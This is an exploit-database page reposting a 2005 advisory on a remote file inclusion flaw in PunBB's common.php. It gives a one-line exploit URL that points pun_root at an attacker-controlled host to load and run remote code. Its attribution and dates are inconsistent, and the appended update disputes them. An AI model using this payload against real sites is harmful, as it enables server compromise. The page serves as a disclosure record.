Advertisement






Remote File Inclusion in forum PunBB

CVE Category Price Severity
CVE-2008-1152 CWE-98 $500 High
Author Risk Exploitation Type Date
KedAns-Dz High Remote 2005-10-28
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005100054

Below is a copy:

Remote File Inclusion in forum PunBB

Date:24/10/2005

Severity: High

version: 1.1.2 >> 1.1.5

The bug reside in common.php

Exploit :

http://www.host.com/forum/include/common.php?pun_root=http://www.host_ev
il.com/cmd?&=id

Discovery by RoDheDoR

L-G-H Team

http://www.lezr.com

--------------------------------------------------------------------------------------------
UPDATE : 

1. The bug is over a year old (see bid 10760).
2. The bug was fixed in 1.1.5, so that version is not vulnerable.
3. It was discovered by Radek Hulan, not "RoDheDoR".
4. The exploit detailed is copied directly from the old bid so "RoDheDoR" was obviously aware of it. 

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum